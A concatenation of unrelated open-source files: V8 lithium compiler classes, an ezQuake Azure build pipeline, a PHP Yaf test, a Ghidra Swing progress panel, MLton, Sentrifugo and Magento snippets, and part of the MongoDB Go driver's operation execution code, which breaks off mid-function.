LOperand* source() const { return source_; }
void set_source(LOperand* operand) { source_ = operand; }
LOperand* destination() const { return destination_; }
void set_destination(LOperand* operand) { destination_ = operand; }
// The gap resolver marks moves as "in-progress" by clearing the
// destination (but not the source).
bool IsPending() const {
return destination_ == NULL && source_ != NULL;
}
// True if this move a move into the given destination operand.
bool Blocks(LOperand* operand) const {
return !IsEliminated() && source()->Equals(operand);
}
// A move is redundant if it's been eliminated, if its source and
// destination are the same, or if its destination is unneeded.
bool IsRedundant() const {
return IsEliminated() || source_->Equals(destination_) || IsIgnored();
}
bool IsIgnored() const {
return destination_ != NULL &&
destination_->IsUnallocated() &&
LUnallocated::cast(destination_)->HasIgnorePolicy();
}
// We clear both operands to indicate move that's been eliminated.
void Eliminate() { source_ = destination_ = NULL; }
bool IsEliminated() const {
ASSERT(source_ != NULL || destination_ == NULL);
return source_ == NULL;
}
private:
LOperand* source_;
LOperand* destination_;
};
class LConstantOperand: public LOperand {
public:
static LConstantOperand* Create(int index) {
ASSERT(index >= 0);
if (index < kNumCachedOperands) return &cache[index];
return new LConstantOperand(index);
}
static LConstantOperand* cast(LOperand* op) {
ASSERT(op->IsConstantOperand());
return reinterpret_cast<LConstantOperand*>(op);
}
static void SetupCache();
private:
static const int kNumCachedOperands = 128;
static LConstantOperand cache[];
LConstantOperand() : LOperand() { }
explicit LConstantOperand(int index) : LOperand(CONSTANT_OPERAND, index) { }
};
class LArgument: public LOperand {
public:
explicit LArgument(int index) : LOperand(ARGUMENT, index) { }
static LArgument* cast(LOperand* op) {
ASSERT(op->IsArgument());
return reinterpret_cast<LArgument*>(op);
}
};
class LStackSlot: public LOperand {
public:
static LStackSlot* Create(int index) {
ASSERT(index >= 0);
if (index < kNumCachedOperands) return &cache[index];
return new LStackSlot(index);
}
static LStackSlot* cast(LOperand* op) {
ASSERT(op->IsStackSlot());
return reinterpret_cast<LStackSlot*>(op);
}
static void SetupCache();
private:
static const int kNumCachedOperands = 128;
static LStackSlot cache[];
LStackSlot() : LOperand() { }
explicit LStackSlot(int index) : LOperand(STACK_SLOT, index) { }
};
class LDoubleStackSlot: public LOperand {
public:
static LDoubleStackSlot* Create(int index) {
ASSERT(index >= 0);
if (index < kNumCachedOperands) return &cache[index];
return new LDoubleStackSlot(index);
}
static LDoubleStackSlot* cast(LOperand* op) {
ASSERT(op->IsStackSlot());
return reinterpret_cast<LDoubleStackSlot*>(op);
}
static void SetupCache();
private:
static const int kNumCachedOperands = 128;
static LDoubleStackSlot cache[];
LDoubleStackSlot() : LOperand() { }
explicit LDoubleStackSlot(int index) : LOperand(DOUBLE_STACK_SLOT, index) { }
};
class LRegister: public LOperand {
public:
static LRegister* Create(int index) {
ASSERT(index >= 0);
if (index < kNumCachedOperands) return &cache[index];
return new LRegister(index);
}
static LRegister* cast(LOperand* op) {
ASSERT(op->IsRegister());
return reinterpret_cast<LRegister*>(op);
}
static void SetupCache();
private:
static const int kNumCachedOperands = 16;
static LRegister cache[];
LRegister() : LOperand() { }
explicit LRegister(int index) : LOperand(REGISTER, index) { }
};
class LDoubleRegister: public LOperand {
public:
static LDoubleRegister* Create(int index) {
ASSERT(index >= 0);
if (index < kNumCachedOperands) return &cache[index];
return new LDoubleRegister(index);
}
static LDoubleRegister* cast(LOperand* op) {
ASSERT(op->IsDoubleRegister());
return reinterpret_cast<LDoubleRegister*>(op);
}
static void SetupCache();
private:
static const int kNumCachedOperands = 16;
static LDoubleRegister cache[];
LDoubleRegister() : LOperand() { }
explicit LDoubleRegister(int index) : LOperand(DOUBLE_REGISTER, index) { }
};
class LParallelMove : public ZoneObject {
public:
LParallelMove() : move_operands_(4) { }
void AddMove(LOperand* from, LOperand* to) {
move_operands_.Add(LMoveOperands(from, to));
}
bool IsRedundant() const;
const ZoneList<LMoveOperands>* move_operands() const {
return &move_operands_;
}
void PrintDataTo(StringStream* stream) const;
private:
ZoneList<LMoveOperands> move_operands_;
};
class LPointerMap: public ZoneObject {
public:
explicit LPointerMap(int position)
: pointer_operands_(8), position_(position), lithium_position_(-1) { }
const ZoneList<LOperand*>* operands() const { return &pointer_operands_; }
int position() const { return position_; }
int lithium_position() const { return lithium_position_; }
void set_lithium_position(int pos) {
ASSERT(lithium_position_ == -1);
lithium_position_ = pos;
}
void RecordPointer(LOperand* op);
void PrintTo(StringStream* stream);
private:
ZoneList<LOperand*> pointer_operands_;
int position_;
int lithium_position_;
};
class LEnvironment: public ZoneObject {
public:
LEnvironment(Handle<JSFunction> closure,
int ast_id,
int parameter_count,
int argument_count,
int value_count,
LEnvironment* outer)
: closure_(closure),
arguments_stack_height_(argument_count),
deoptimization_index_(Safepoint::kNoDeoptimizationIndex),
translation_index_(-1),
ast_id_(ast_id),
parameter_count_(parameter_count),
values_(value_count),
representations_(value_count),
spilled_registers_(NULL),
spilled_double_registers_(NULL),
outer_(outer) {
}
Handle<JSFunction> closure() const { return closure_; }
int arguments_stack_height() const { return arguments_stack_height_; }
int deoptimization_index() const { return deoptimization_index_; }
int translation_index() const { return translation_index_; }
int ast_id() const { return ast_id_; }
int parameter_count() const { return parameter_count_; }
LOperand** spilled_registers() const { return spilled_registers_; }
LOperand** spilled_double_registers() const {
return spilled_double_registers_;
}
const ZoneList<LOperand*>* values() const { return &values_; }
LEnvironment* outer() const { return outer_; }
void AddValue(LOperand* operand, Representation representation) {
values_.Add(operand);
representations_.Add(representation);
}
bool HasTaggedValueAt(int index) const {
return representations_[index].IsTagged();
}
void Register(int deoptimization_index, int translation_index) {
ASSERT(!HasBeenRegistered());
deoptimization_index_ = deoptimization_index;
translation_index_ = translation_index;
}
bool HasBeenRegistered() const {
return deoptimization_index_ != Safepoint::kNoDeoptimizationIndex;
}
void SetSpilledRegisters(LOperand** registers,
LOperand** double_registers) {
spilled_registers_ = registers;
spilled_double_registers_ = double_registers;
}
void PrintTo(StringStream* stream);
private:
Handle<JSFunction> closure_;
int arguments_stack_height_;
int deoptimization_index_;
int translation_index_;
int ast_id_;
int parameter_count_;
ZoneList<LOperand*> values_;
ZoneList<Representation> representations_;
// Allocation index indexed arrays of spill slot operands for registers
// that are also in spill slots at an OSR entry. NULL for environments
// that do not correspond to an OSR entry.
LOperand** spilled_registers_;
LOperand** spilled_double_registers_;
LEnvironment* outer_;
friend class LCodegen;
};
// Iterates over the non-null, non-constant operands in an environment.
class ShallowIterator BASE_EMBEDDED {
public:
explicit ShallowIterator(LEnvironment* env)
: env_(env),
limit_(env != NULL ? env->values()->length() : 0),
current_(0) {
current_ = AdvanceToNext(0);
}
inline bool HasNext() {
return env_ != NULL && current_ < limit_;
}
inline LOperand* Next() {
ASSERT(HasNext());
return env_->values()->at(current_);
}
inline void Advance() {
current_ = AdvanceToNext(current_ + 1);
}
inline LEnvironment* env() { return env_; }
private:
inline bool ShouldSkip(LOperand* op) {
return op == NULL || op->IsConstantOperand() || op->IsArgument();
}
inline int AdvanceToNext(int start) {
while (start < limit_ && ShouldSkip(env_->values()->at(start))) {
start++;
}
return start;
}
LEnvironment* env_;
int limit_;
int current_;
};
// Iterator for non-null, non-constant operands incl. outer environments.
class DeepIterator BASE_EMBEDDED {
public:
explicit DeepIterator(LEnvironment* env)
: current_iterator_(env) { }
inline bool HasNext() {
if (current_iterator_.HasNext()) return true;
if (current_iterator_.env() == NULL) return false;
AdvanceToOuter();
return current_iterator_.HasNext();
}
inline LOperand* Next() {
ASSERT(current_iterator_.HasNext());
return current_iterator_.Next();
}
inline void Advance() {
if (current_iterator_.HasNext()) {
current_iterator_.Advance();
} else {
AdvanceToOuter();
}
}
private:
inline void AdvanceToOuter() {
current_iterator_ = ShallowIterator(current_iterator_.env()->outer());
}
ShallowIterator current_iterator_;
};
} } // namespace v8::internal
#endif // V8_LITHIUM_H_
| {
"pile_set_name": "Github"
} |
# C/C++ with GCC
# Build your C/C++ project with GCC using make.
# Add steps that publish test results, save build artifacts, deploy, and more:
# https://docs.microsoft.com/azure/devops/pipelines/apps/c-cpp/gcc
# at pipeline level, set 'ezquake.githubconnection' & 'ezquake.githubreponame' variables
strategy:
matrix:
linux:
imageName: 'ubuntu-latest'
mac:
imageName: 'macos-latest'
#windows:
# imageName: 'windows-latest'
trigger:
- master
pool:
vmImage: $(imageName)
steps:
- script: |
sudo apt-get -y update
sudo apt install git build-essential mingw-w64 libsdl2-2.0-0 libsdl2-dev libjansson-dev libexpat1-dev libcurl4-openssl-dev libpng-dev libjpeg-dev libspeex-dev libspeexdsp-dev
make && make strip
tar -cvzf ezquake-latest-linux64.zip ezquake-*-* LICENSE
make clean
EZ_CONFIG_FILE=.config_windows make
EZ_CONFIG_FILE=.config_windows make strip
zip ezquake-latest-win32.zip ezquake.exe LICENSE release-notes.md
displayName: 'make (linux/win32)'
condition: eq( variables['Agent.OS'], 'Linux' )
- script: |
brew update
brew install pkgconfig pcre sdl2 sdl2_net sdl2_image sdl2_gfx sdl2_mixer jansson speex speexdsp
make && make strip
sh ./misc/install/create_osx_bundle.sh
mv ezquake.zip ezquake-latest-osx.zip
displayName: 'make (osx)'
condition: eq( variables['Agent.OS'], 'Darwin' )
- task: CopyFiles@2
inputs:
contents: ezquake-latest-*.zip
targetFolder: $(Build.ArtifactStagingDirectory)/distributableBinaries/
- task: CopyFiles@2
inputs:
contents: release-notes.md
targetFolder: $(Build.ArtifactStagingDirectory)/distributableBinaries/
- task: PublishBuildArtifacts@1
inputs:
pathtoPublish: '$(Build.ArtifactStagingDirectory)/distributableBinaries/'
artifactName: 'latest-build'
- task: GitHubRelease@0
displayName: 'Edit GitHub Release'
inputs:
gitHubConnection: '$(ezquake.githubconnection)'
repositoryName: '$(ezquake.githubreponame)'
action: edit
tag: latest
assets: $(Build.ArtifactStagingDirectory)/distributableBinaries/*
isPreRelease: true
assetUploadMode: replace
addChangeLog: false
releaseNotesFile: 'release-notes.md'
| {
"pile_set_name": "Github"
} |
<?php
if (isset($argv[1])) {
$_GET['mode']=$argv[1];
}
if (isset($_GET['mode']) && $_GET['mode'] == 'yaf') {
include('bootstrap_yaf_so.php');
} else {
include('bootstrap.php');
}
$view = new Yaf_View_Simple(
TEST_APPLICATION_PATH.'application/views/'
);
$view->render('test/testCase039.phtml', array('tpl'=>'test/testCase038.phtml'));
?> | {
"pile_set_name": "Github"
} |
/* ###
* IP: GHIDRA
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package ghidra.app.merge;
import java.awt.BorderLayout;
import java.awt.Dimension;
import java.awt.event.ActionEvent;
import java.awt.event.ActionListener;
import javax.swing.*;
import docking.widgets.label.GDLabel;
import docking.widgets.label.GIconLabel;
import resources.ResourceManager;
/**
* The PhaseProgressPanel provides a title, progress bar and message for the current phase that is
* in progress
*/
public class PhaseProgressPanel extends JPanel {
private final static String DEFAULT_INFO = "Merge programs in progress...";
private ImageIcon INFORM_ICON = ResourceManager.loadImage("images/information.png");
private JLabel titleLabel;
private JProgressBar progressBar;
private JPanel progressMessagePanel;
private JLabel messageIcon;
private JLabel messageLabel;
private boolean isShowingProgress = false;
private boolean isShowingMessage = false;
private String title;
private SpringLayout progressLayout;
private Timer updateTimer;
private boolean isTimerRunning;
private String message;
private int progress;
private int lastProgress = -1;
public PhaseProgressPanel(String title) {
this.title = title;
progressLayout = new SpringLayout();
setLayout(progressLayout);
createProgressPanel();
adjustPreferredSize();
}
/**
* Determines and sets the preferred size of this panel.
*/
private void adjustPreferredSize() {
int width = titleLabel.getPreferredSize().width + 5;
int height = titleLabel.getPreferredSize().height + 5;
if (isShowingProgress) {
height += 5;
height += progressBar.getPreferredSize().height;
width = Math.max(width, progressBar.getPreferredSize().width);
}
if (isShowingMessage) {
height += 5;
height += progressMessagePanel.getPreferredSize().height;
width = Math.max(width, progressMessagePanel.getPreferredSize().width);
}
setPreferredSize(new Dimension(width, height));
}
private void createProgressPanel() {
titleLabel = new GDLabel(title);
add(titleLabel);
progressLayout.putConstraint(SpringLayout.WEST, titleLabel, 5, SpringLayout.WEST, this);
progressLayout.putConstraint(SpringLayout.NORTH, titleLabel, 5, SpringLayout.NORTH, this);
progressBar = new JProgressBar(SwingConstants.HORIZONTAL);
Dimension dim = progressBar.getPreferredSize();
progressBar.setPreferredSize(new Dimension(500, (int) dim.getHeight()));
progressBar.setMaximum(100);
progressLayout.putConstraint(SpringLayout.NORTH, progressBar, 5, SpringLayout.SOUTH,
titleLabel);
progressLayout.putConstraint(SpringLayout.WEST, progressBar, 0, SpringLayout.WEST,
titleLabel);
doSetProgress(0);
progressMessagePanel = new JPanel(new BorderLayout());
messageIcon = new GIconLabel(INFORM_ICON);
messageIcon.setBorder(BorderFactory.createEmptyBorder(0, 0, 0, 5));
messageLabel = new GDLabel(DEFAULT_INFO);
progressMessagePanel.add(messageIcon, BorderLayout.WEST);
progressMessagePanel.add(messageLabel, BorderLayout.CENTER);
doSetMessage(DEFAULT_INFO);
// Sets up the timer for updating the GUI.
updateTimer = new Timer(250, new ActionListener() {
@Override
public void actionPerformed(ActionEvent e) {
update();
}
});
}
// Method for use by the timer to update the progress bar or message.
private synchronized void update() {
boolean changed = false;
if (message != null) {
doSetMessage(message);
message = null;
changed = true;
}
if (progress != lastProgress) {
doSetProgress(progress);
lastProgress = progress;
changed = true;
}
if (!changed) {
updateTimer.stop();
isTimerRunning = false;
}
}
/**
* Method to get the panel to update with changes when already on the screen.
*/
private void doValidate() {
invalidate();
repaint();
adjustPreferredSize();
}
/**
* Sets the title line displayed by this panel.
* @param newTitle the new title string
*/
public void setTitle(String newTitle) {
titleLabel.setText(newTitle);
doValidate();
}
/**
* Sets the progress message within this panel.
* @param newMessage the new message text to be displayed.
*/
private void doSetMessage(String newMessage) {
messageLabel.setText(newMessage);
if (!isShowingMessage) {
add(progressMessagePanel);
progressLayout.putConstraint(SpringLayout.WEST, progressMessagePanel, 0,
SpringLayout.WEST, titleLabel);
progressLayout.putConstraint(SpringLayout.NORTH, progressMessagePanel, 5,
SpringLayout.SOUTH, (isShowingProgress ? progressBar : titleLabel));
isShowingMessage = true;
}
doValidate();
}
/**
* Sets the progress message within this panel.
* @param message the new message text to be displayed.
*/
public synchronized void setMessage(String message) {
this.message = message;
if (!isTimerRunning) {
updateTimer.start();
isTimerRunning = true;
}
}
/**
* Fills in the progress bar to the indicated percent.
* @param progressPercentage total percent of the progress bar that should be filled in.
*/
private void doSetProgress(final int progressPercentage) {
if (progressPercentage < 0 || progressPercentage > 100) {
throw new RuntimeException(
"Invalid progress value (" + progressPercentage + "). Must be from 0 to 100.");
}
if (!isShowingProgress) {
add(progressBar);
isShowingProgress = true;
}
progressBar.setValue(progressPercentage);
doValidate();
}
/**
* Fills in the progress bar to the indicated percent.
* @param progressPercentage total percent of the progress bar that should be filled in.
*/
public synchronized void setProgress(int progressPercentage) {
progress = progressPercentage;
if (!isTimerRunning) {
updateTimer.start();
isTimerRunning = true;
}
}
/**
* Removes the message from being displayed by this panel.
* Setting the message text will cause it to get added again.
*/
public void removeMessage() {
remove(progressMessagePanel);
isShowingMessage = false;
doValidate();
}
/**
* Removes the progress bar from being displayed by this panel.
* Setting progress will cause it to get added again.
*/
public void removeProgress() {
remove(progressBar);
if (isShowingMessage) {
progressLayout.putConstraint(SpringLayout.NORTH, messageIcon, 5, SpringLayout.SOUTH,
titleLabel);
}
isShowingProgress = false;
doValidate();
}
// /**
// * @param args
// */
// public static void main(String[] args) {
// PhaseProgressPanel panel = new PhaseProgressPanel("Progress In Current Phase");
//
//// try {
//// UIManager.setLookAndFeel(UIManager.getSystemLookAndFeelClassName());
//// } catch (Exception e) {
//// }
//
// JFrame frame = new JFrame();
// frame.setSize(800,400);
// frame.setVisible(true);
//
// frame.getContentPane().setLayout(new BorderLayout());
// frame.getContentPane().add(panel, BorderLayout.CENTER);
// frame.validate();
//
// try {
// Thread.sleep(2000);
// panel.setProgress(0);
// panel.setMessage("Initializing Code Unit Merge...");
// Thread.sleep(2000);
// panel.setProgress(20);
// panel.setMessage("Merging Bytes...");
// Thread.sleep(2000);
// panel.setProgress(40);
// panel.setMessage("Merging Instructions...");
// Thread.sleep(2000);
// panel.setProgress(60);
// panel.setMessage("Merging Data...");
// Thread.sleep(2000);
// panel.removeMessage();
// panel.setProgress(70);
// Thread.sleep(2000);
// panel.setMessage("Merging Data Again...");
// Thread.sleep(2000);
// panel.setProgress(80);
// panel.setMessage("Merging Equates...");
// Thread.sleep(2000);
// panel.setProgress(100);
// panel.setMessage("Resolving conflicts...");
// Thread.sleep(2000);
// panel.removeProgress();
// panel.setMessage("The End...");
// Thread.sleep(2000);
// panel.removeMessage();
// Thread.sleep(2000);
// frame.setVisible(false);
// System.exit(0);
// } catch (InterruptedException e) {
// Err.error(this, null, "Error", "Unexpected Exception: " + e.getMessage(), e);
// }
//
// }
}
| {
"pile_set_name": "Github"
} |
(* Copyright (C) 2002-2006 Henry Cejtin, Matthew Fluet, Suresh
* Jagannathan, and Stephen Weeks.
*
* MLton is released under a HPND-style license.
* See the file MLton-LICENSE for details.
*)
functor IOConvert
(structure IO: IO) :
IO_1997 =
struct
open IO
exception TerminatedStream
end
| {
"pile_set_name": "Github"
} |
<?php
/*********************************************************************************
* This file is part of Sentrifugo.
* Copyright (C) 2014 Sapplica
*
* Sentrifugo is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* Sentrifugo is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with Sentrifugo. If not, see <http://www.gnu.org/licenses/>.
*
* Sentrifugo Support <[email protected]>
********************************************************************************/
/**
*
* @model Forward Expenses Model
* @author sagarsoft
*
*/
class Expenses_Model_Forwardexpenses extends Zend_Db_Table_Abstract
{
//echo "expensesmodel";exit;
protected $_name = 'expense_forward';
protected $_primary = 'id';
/**
* This method will save or update the forwarded expense details.
*
* @param array $data
* @param string $where
*/
public function saveOrUpdateForwardData($data, $where){
if($where != ''){
$this->update($data, $where);
return 'update';
} else {
$this->insert($data);
$id=$this->getAdapter()->lastInsertId($this->_name);
return $id;
}
}
} | {
"pile_set_name": "Github"
} |
<?php
/**
* Interface for output class of standard profiler driver.
*
* Copyright © Magento, Inc. All rights reserved.
* See COPYING.txt for license details.
*/
namespace Magento\Framework\Profiler\Driver\Standard;
/**
* Interface \Magento\Framework\Profiler\Driver\Standard\OutputInterface
*
*/
interface OutputInterface
{
/**
* Display profiling results in appropriate format
*
* @param Stat $stat
* @return void
*/
public function display(Stat $stat);
}
| {
"pile_set_name": "Github"
} |
package driver
import (
"bytes"
"context"
"errors"
"fmt"
"strconv"
"strings"
"time"
"go.mongodb.org/mongo-driver/bson"
"go.mongodb.org/mongo-driver/bson/bsontype"
"go.mongodb.org/mongo-driver/bson/primitive"
"go.mongodb.org/mongo-driver/event"
"go.mongodb.org/mongo-driver/mongo/readconcern"
"go.mongodb.org/mongo-driver/mongo/readpref"
"go.mongodb.org/mongo-driver/mongo/writeconcern"
"go.mongodb.org/mongo-driver/x/bsonx/bsoncore"
"go.mongodb.org/mongo-driver/x/mongo/driver/description"
"go.mongodb.org/mongo-driver/x/mongo/driver/session"
"go.mongodb.org/mongo-driver/x/mongo/driver/wiremessage"
)
const defaultLocalThreshold = 15 * time.Millisecond
var dollarCmd = [...]byte{'.', '$', 'c', 'm', 'd'}
var (
// ErrNoDocCommandResponse occurs when the server indicated a response existed, but none was found.
ErrNoDocCommandResponse = errors.New("command returned no documents")
// ErrMultiDocCommandResponse occurs when the server sent multiple documents in response to a command.
ErrMultiDocCommandResponse = errors.New("command returned multiple documents")
// ErrReplyDocumentMismatch occurs when the number of documents returned in an OP_QUERY does not match the numberReturned field.
ErrReplyDocumentMismatch = errors.New("number of documents returned does not match numberReturned field")
// ErrNonPrimaryReadPref is returned when a read is attempted in a transaction with a non-primary read preference.
ErrNonPrimaryReadPref = errors.New("read preference in a transaction must be primary")
)
const (
// maximum BSON object size when client side encryption is enabled
cryptMaxBsonObjectSize uint32 = 2097152
// minimum wire version necessary to use automatic encryption
cryptMinWireVersion int32 = 8
)
// InvalidOperationError is returned from Validate and indicates that a required field is missing
// from an instance of Operation.
type InvalidOperationError struct{ MissingField string }
func (err InvalidOperationError) Error() string {
return "the " + err.MissingField + " field must be set on Operation"
}
// opReply stores information returned in an OP_REPLY response from the server.
// The err field stores any error that occurred when decoding or validating the OP_REPLY response.
type opReply struct {
responseFlags wiremessage.ReplyFlag
cursorID int64
startingFrom int32
numReturned int32
documents []bsoncore.Document
err error
}
// startedInformation keeps track of all of the information necessary for monitoring started events.
type startedInformation struct {
cmd bsoncore.Document
requestID int32
cmdName string
documentSequenceIncluded bool
connID string
redacted bool
}
// finishedInformation keeps track of all of the information necessary for monitoring success and failure events.
type finishedInformation struct {
cmdName string
requestID int32
response bsoncore.Document
cmdErr error
connID string
startTime time.Time
redacted bool
}
// Operation is used to execute an operation. It contains all of the common code required to
// select a server, transform an operation into a command, write the command to a connection from
// the selected server, read a response from that connection, process the response, and potentially
// retry.
//
// The required fields are Database, CommandFn, and Deployment. All other fields are optional.
//
// While an Operation can be constructed manually, drivergen should be used to generate an
// implementation of an operation instead. This will ensure that there are helpers for constructing
// the operation and that this type isn't configured incorrectly.
type Operation struct {
// CommandFn is used to create the command that will be wrapped in a wire message and sent to
// the server. This function should only add the elements of the command and not start or end
// the enclosing BSON document. Per the command API, the first element must be the name of the
// command to run. This field is required.
CommandFn func(dst []byte, desc description.SelectedServer) ([]byte, error)
// Database is the database that the command will be run against. This field is required.
Database string
// Deployment is the MongoDB Deployment to use. While most of the time this will be multiple
// servers, commands that need to run against a single, preselected server can use the
// SingleServerDeployment type. Commands that need to run on a preselected connection can use
// the SingleConnectionDeployment type.
Deployment Deployment
// ProcessResponseFn is called after a response to the command is returned. The server is
// provided for types like Cursor that are required to run subsequent commands using the same
// server.
ProcessResponseFn func(response bsoncore.Document, srvr Server, desc description.Server) error
// Selector is the server selector that's used during both initial server selection and
// subsequent selection for retries. Depending on the Deployment implementation, the
// SelectServer method may not actually be called.
Selector description.ServerSelector
// ReadPreference is the read preference that will be attached to the command. If this field is
// not specified a default read preference of primary will be used.
ReadPreference *readpref.ReadPref
// ReadConcern is the read concern used when running read commands. This field should not be set
// for write operations. If this field is set, it will be encoded onto the commands sent to the
// server.
ReadConcern *readconcern.ReadConcern
// MinimumReadConcernWireVersion specifies the minimum wire version to add the read concern to
// the command being executed.
MinimumReadConcernWireVersion int32
// WriteConcern is the write concern used when running write commands. This field should not be
// set for read operations. If this field is set, it will be encoded onto the commands sent to
// the server.
WriteConcern *writeconcern.WriteConcern
// MinimumWriteConcernWireVersion specifies the minimum wire version to add the write concern to
// the command being executed.
MinimumWriteConcernWireVersion int32
// Client is the session used with this operation. This can be either an implicit or explicit
// session. If the server selected does not support sessions and Client is specified the
// behavior depends on the session type. If the session is implicit, the session fields will not
// be encoded onto the command. If the session is explicit, an error will be returned. The
// caller is responsible for ensuring that this field is nil if the Deployment does not support
// sessions.
Client *session.Client
// Clock is a cluster clock, different from the one contained within a session.Client. This
// allows updating cluster times for a global cluster clock while allowing individual session's
// cluster clocks to be only updated as far as the last command that's been run.
Clock *session.ClusterClock
// RetryMode specifies how to retry. There are three modes that enable retry: RetryOnce,
// RetryOncePerCommand, and RetryContext. For more information about what these modes do, please
// refer to their definitions. Both RetryMode and Type must be set for retryability to be enabled.
RetryMode *RetryMode
// Type specifies the kind of operation this is. There is only one mode that enables retry: Write.
// For more information about what this mode does, please refer to it's definition. Both Type and
// RetryMode must be set for retryability to be enabled.
Type Type
// Batches contains the documents that are split when executing a write command that potentially
// has more documents than can fit in a single command. This should only be specified for
// commands that are batch compatible. For more information, please refer to the definition of
// Batches.
Batches *Batches
// Legacy sets the legacy type for this operation. There are only 3 types that require legacy
// support: find, getMore, and killCursors. For more information about LegacyOperationKind,
// please refer to it's definition.
Legacy LegacyOperationKind
// CommandMonitor specifies the monitor to use for APM events. If this field is not set,
// no events will be reported.
CommandMonitor *event.CommandMonitor
// Crypt specifies a Crypt object to use for automatic client side encryption and decryption.
Crypt *Crypt
}
// shouldEncrypt returns true if this operation should automatically be encrypted.
func (op Operation) shouldEncrypt() bool {
return op.Crypt != nil && !op.Crypt.BypassAutoEncryption
}
// selectServer handles performing server selection for an operation.
func (op Operation) selectServer(ctx context.Context) (Server, error) {
if err := op.Validate(); err != nil {
return nil, err
}
selector := op.Selector
if selector == nil {
rp := op.ReadPreference
if rp == nil {
rp = readpref.Primary()
}
selector = description.CompositeSelector([]description.ServerSelector{
description.ReadPrefSelector(rp),
description.LatencySelector(defaultLocalThreshold),
})
}
return op.Deployment.SelectServer(ctx, selector)
}
// Validate validates this operation, ensuring the fields are set properly.
func (op Operation) Validate() error {
if op.CommandFn == nil {
return InvalidOperationError{MissingField: "CommandFn"}
}
if op.Deployment == nil {
return InvalidOperationError{MissingField: "Deployment"}
}
if op.Database == "" {
return InvalidOperationError{MissingField: "Database"}
}
if op.Client != nil && !writeconcern.AckWrite(op.WriteConcern) {
return errors.New("session provided for an unacknowledged write")
}
return nil
}
// Execute runs this operation. The scratch parameter will be used and overwritten (potentially many
// times), this should mainly be used to enable pooling of byte slices.
func (op Operation) Execute(ctx context.Context, scratch []byte) error {
err := op.Validate()
if err != nil {
return err
}
srvr, err := op.selectServer(ctx)
if err != nil {
return err
}
conn, err := srvr.Connection(ctx)
if err != nil {
return err
}
defer conn.Close()
desc := description.SelectedServer{Server: conn.Description(), Kind: op.Deployment.Kind()}
scratch = scratch[:0]
if desc.WireVersion == nil || desc.WireVersion.Max < 4 {
switch op.Legacy {
case LegacyFind:
return op.legacyFind(ctx, scratch, srvr, conn, desc)
case LegacyGetMore:
return op.legacyGetMore(ctx, scratch, srvr, conn, desc)
case LegacyKillCursors:
return op.legacyKillCursors(ctx, scratch, srvr, conn, desc)
}
}
if desc.WireVersion == nil || desc.WireVersion.Max < 3 {
switch op.Legacy {
case LegacyListCollections:
return op.legacyListCollections(ctx, scratch, srvr, conn, desc)
case LegacyListIndexes:
return op.legacyListIndexes(ctx, scratch, srvr, conn, desc)
}
}
var res bsoncore.Document
var operationErr WriteCommandError
var original error
var retries int
retryable := op.retryable(desc.Server)
if retryable && op.RetryMode != nil {
switch op.Type {
case Write:
if op.Client == nil {
break
}
switch *op.RetryMode {
case RetryOnce, RetryOncePerCommand:
retries = 1
case RetryContext:
retries = -1
}
op.Client.RetryWrite = false
if *op.RetryMode > RetryNone {
op.Client.RetryWrite = true
if !op.Client.Committing && !op.Client.Aborting {
op.Client.IncrementTxnNumber()
}
}
case Read:
switch *op.RetryMode {
case RetryOnce, RetryOncePerCommand:
retries = 1
case RetryContext:
retries = -1
}
}
}
batching := op.Batches.Valid()
retryEnabled := op.RetryMode != nil && op.RetryMode.Enabled()
currIndex := 0
for {
if batching {
targetBatchSize := desc.MaxDocumentSize
maxDocSize := desc.MaxDocumentSize
if op.shouldEncrypt() {
// For client-side encryption, we want the batch to be split at 2 MiB instead of 16MiB.
// If there's only one document in the batch, it can be up to 16MiB, so we set target batch size to
// 2MiB but max document size to 16MiB. This will allow the AdvanceBatch call to create a batch
// with a single large document.
targetBatchSize = cryptMaxBsonObjectSize
}
err = op.Batches.AdvanceBatch(int(desc.MaxBatchCount), int(targetBatchSize), int(maxDocSize))
if err != nil {
// TODO(GODRIVER-982): Should we also be returning operationErr?
return err
}
}
// convert to wire message
if len(scratch) > 0 {
scratch = scratch[:0]
}
wm, startedInfo, err := op.createWireMessage(ctx, scratch, desc, conn)
if err != nil {
return err
}
// set extra data and send event if possible
startedInfo.connID = conn.ID()
startedInfo.cmdName = op.getCommandName(startedInfo.cmd)
startedInfo.redacted = op.redactCommand(startedInfo.cmdName, startedInfo.cmd)
op.publishStartedEvent(ctx, startedInfo)
// get the moreToCome flag information before we compress
moreToCome := wiremessage.IsMsgMoreToCome(wm)
// compress wiremessage if allowed
if compressor, ok := conn.(Compressor); ok && op.canCompress(startedInfo.cmdName) {
wm, err = compressor.CompressWireMessage(wm, nil)
if err != nil {
return err
}
}
finishedInfo := finishedInformation{
cmdName: startedInfo.cmdName,
requestID: startedInfo.requestID,
startTime: time.Now(),
connID: startedInfo.connID,
redacted: startedInfo.redacted,
}
// roundtrip using either the full roundTripper or a special one for when the moreToCome
// flag is set
var roundTrip = op.roundTrip
if moreToCome {
roundTrip = op.moreToComeRoundTrip
}
res, err = roundTrip(ctx, conn, wm)
if ep, ok := srvr.(ErrorProcessor); ok {
ep.ProcessError(err, conn)
}
finishedInfo.response = res
finishedInfo.cmdErr = err
op.publishFinishedEvent(ctx, finishedInfo)
var perr error
if op.ProcessResponseFn != nil {
perr = op.ProcessResponseFn(res, srvr, desc.Server)
}
switch tt := err.(type) {
case WriteCommandError:
if e := err.(WriteCommandError); retryable && op.Type == Write && e.UnsupportedStorageEngine() {
return ErrUnsupportedStorageEngine
}
connDesc := conn.Description()
retryableErr := tt.Retryable(connDesc.WireVersion)
preRetryWriteLabelVersion := connDesc.WireVersion != nil && connDesc.WireVersion.Max < 9
inTransaction := !(op.Client.Committing || op.Client.Aborting) && op.Client.TransactionRunning()
// If retry is enabled and the operation isn't in a transaction, add a RetryableWriteError label for
// retryable errors from pre-4.4 servers
